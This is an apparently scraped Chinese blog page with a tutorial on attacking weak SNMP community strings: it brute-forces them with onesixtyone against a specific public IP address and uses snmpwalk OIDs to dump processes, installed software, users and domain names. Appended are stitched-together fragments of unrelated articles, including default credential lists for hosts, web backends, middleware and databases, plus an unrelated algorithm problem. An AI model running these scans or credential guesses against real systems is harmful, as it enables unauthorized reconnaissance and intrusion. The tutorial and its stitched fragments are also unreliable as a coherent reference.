snmap弱口令攻击利用

科普Snmap:

  简单网络管理协议(SNMP) 是专门设计用于在 IP 网络管理网络节点(服务器、工作站、路由器、交换机及HUBS等)的一种标准协议,它是一种应用层协议。具体废话就不多说了,自己百度去。默认端口号是:161



如果能获取只读(RO)或读/写(RW)权限的团体字符串,将对你从设备中提取信息发挥重要作用,

snmp v1 v2天生存在安全缺陷,snmp v3中添加了加密功能提供了更好的检查机制,增强了安全性为了获取管理一台交换机的权限,首先你需要找到它的SNMP团体字符串。

团体字符串默认为:public

如果你不知道目标团体字符串

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 58.215.76.23 -o my.log -w 100

显示对方团体字符串为 public

查看onesixtyone 目录

dpkg -L onesixtyone

查看自带密码目录,你也可以使用自己的字典

cat /usr/share/doc/onesixtyone/dict.txt




snmpwalk -c public -v 1  ip .1.3.6.1.2.1.25.1 得到取得windows端的系统进程用户数等

snmpwalk -c public -v 1 ip .1.3.6.1.2.1.25.2.2 取得系统总内存

snmpwalk -c public -v 1  ip hrSystemNumUsers 取得系统用户数

snmpwalk -c public -v 1  ip .1.3.6.1.2.1.4.20 取得IP信息

snmpwalk -v 2c -c public ip .1.3.6.1.2.1.1 查看系统信息

其中-v是指版本,-c 是指密钥。

snmpwalk功能很多,可以获取系统各种信息,只要更改后面的信息类型即可。如果不知道什么类型,也可以不指定,这样所有系统信息都获取到:

常用:snmpwalk -v 2c -c public 10.0.1.52

另外常用的

.1.3.6.1.4.1.77.1.4.1.0  列出域名
.1.3.6.1.2.1.25.6.3.1.2  列出安装的软件

.1.3.6.1.2.1.25.4.2.1.2  列出系统进程

展示一波成功的案例:

原文地址:https://www.cnblogs.com/nul1/p/11227265.html

时间: 2024-11-09 02:07:43

snmap弱口令攻击利用的相关文章

弱口令攻击

弱口令攻击三部曲 1. 手动,经验攻击 2. 工具,弱密码破解 3. 工具,彩虹表破解 对于第1种,大家就手动敲吧 遇到主机:administrator/123456,administrator /abcd-1234,guest/guest,root/root 遇到web后台:admin/admin,admin/admin888,phpcms/phpcms等等 遇到中间件:admin/admin,manager/admin,root/admin,weblogic/weblogic等等 遇到数据库

网络渗透

命令: (1)netstat 查看活动的TCP连接.路由器和网络接口信息. (2)tracert命令:显示数据包到达目标计算机经过的路径,并显示到达每个节点的时间.适用于大型网络的测试. tracert [-d] [-h MaxHops] [-j Hostlist][-w Timeout][TargetName] (3)nslookup  检测网络中的DNS服务器是否能正确实现域名.如 nslookup www.google.com (4)at : 入侵攻击的一个重要命令,可以在指定时间之行木马

Window应急响应(四):挖矿病毒

0x00 前言 ? 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题. 0x01 应急场景 ? 某天上午重启服务器的时候,发现程序启动很慢,打开任务管理器,发现cpu被占用接近100%,服务器资源占用严重. 0x02 事件分析 ? 登录网站服务器进行排查,发现多个异常进程: 分析进程参数: wmic process get caption,co

Linux应急响应(三):挖矿病毒

0x00 前言 ? 随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式.新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue).web攻击多种漏洞(如Tomcat弱口令攻击.Weblogic WLS组件漏洞.Jboss反序列化漏洞.Struts2远程命令执行等),导致大量服务器被感染挖矿程序的现象 . 0x01 应急场景 ? 某天,安全管理员在登录安全设备巡检时,发现某台

2018 年 IoT 那些事儿

本文作者:murphyzhang.xmy.fen @腾讯安全云鼎实验室 2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网.随着5G网络的发展,我们身边的 IoT 设备会越来越多.与此同时,IoT 的安全问题也慢慢显露出来. 腾讯安全云鼎实验室对 IoT 安全进行了长期关注,本文通过云鼎实验室听风威胁感知平台收集的 IoT 安全情报进行分析,从IoT 的发展现状.IoT 攻击的常见设备.IoT 攻击的主要地区和 IoT 恶意软件的传播方式

云时代重新定义主机安全:自动化安全闭环是核心

摘要:随着越来越多的企业和机构正在逐步上云,主机安全是企业上云首先需要考虑的问题.在当前安全事件频发,且企业还没有具备专业安全运营能力的现状下,只具备检测或防御等单一功能的传统主机安全产品已不再适应这样的场景和需求,产品具备检测.防御为一体的安全闭环能力将成为刚需. 一.主机安全面临的挑战 1. 恶意攻击仍将持续猖獗 所谓擒贼先擒王,主机对于一家企业来说是整个系统的根本,攻陷了主机就等于攻陷了整个企业,因此主机层面的攻防战争永远硝烟弥漫.挖矿程序.蠕虫病毒.勒索病毒.木马程序.DDoS木马.后门

【网络安全】——服务端安全(注入攻击、认证与会话管理和访问控制、访问控制、加密算法与随机数、Web框架安全、应用层拒绝服务攻击DDOS等)

这一篇博客记录的是服务端安全应用安全的知识,学习内容来自<白帽子讲Web安全>. ? 承接自上一篇客户端安全之后,包括注入攻击.认证与会话管理和访问控制.访问控制.加密算法与随机数.Web框架安全.应用层拒绝服务攻击DDOS.Web Server安全等方面. @ 目录 注入攻击 SQL注入 盲注 Timing Attack 数据库攻击技巧 常见的攻击机巧 命令执行 攻击存储过程 编码问题 SQL Column Truncation 正确地防御SQL注入 其他注入攻击 文件上传漏洞 文件上传漏洞

嵌入级联分类器

嵌入级联分类器 nested cascade detector detector AdaBoost Real AdaBoost 读"C. Huang, H. Ai, B. Wu, and S. Lao, 'Boosting Nested Cascade Detector for Multi-View Face Detection',ICPR, 2004,Vol II:415-418"笔记 论文主要贡献点 提出一种基于Haar 特征查找表的弱分类器,并使用Real Adaboost学习出

bzoj2127happiness

bzoj2127happiness 题意: 高一一班的座位表是个n*m的矩阵.这学期要分文理科了,每个同学对于选择文科与理科有着自己的喜悦值,而相邻两个同学如果能同时选文科或者理科,那么他们又将收获一些喜悦值.求全班的喜悦值总和的最大值. 题解: 题解太难写,转黄学长的吧(我太弱) “ 利用最小割考虑. 对于原图中所有相邻的两个人A,B,我们建边: s->A:cost[A文]+c[文][A][B]/2,s->B:cost[B文]+c[文][A][B]/2; A->t:cost[A理]+c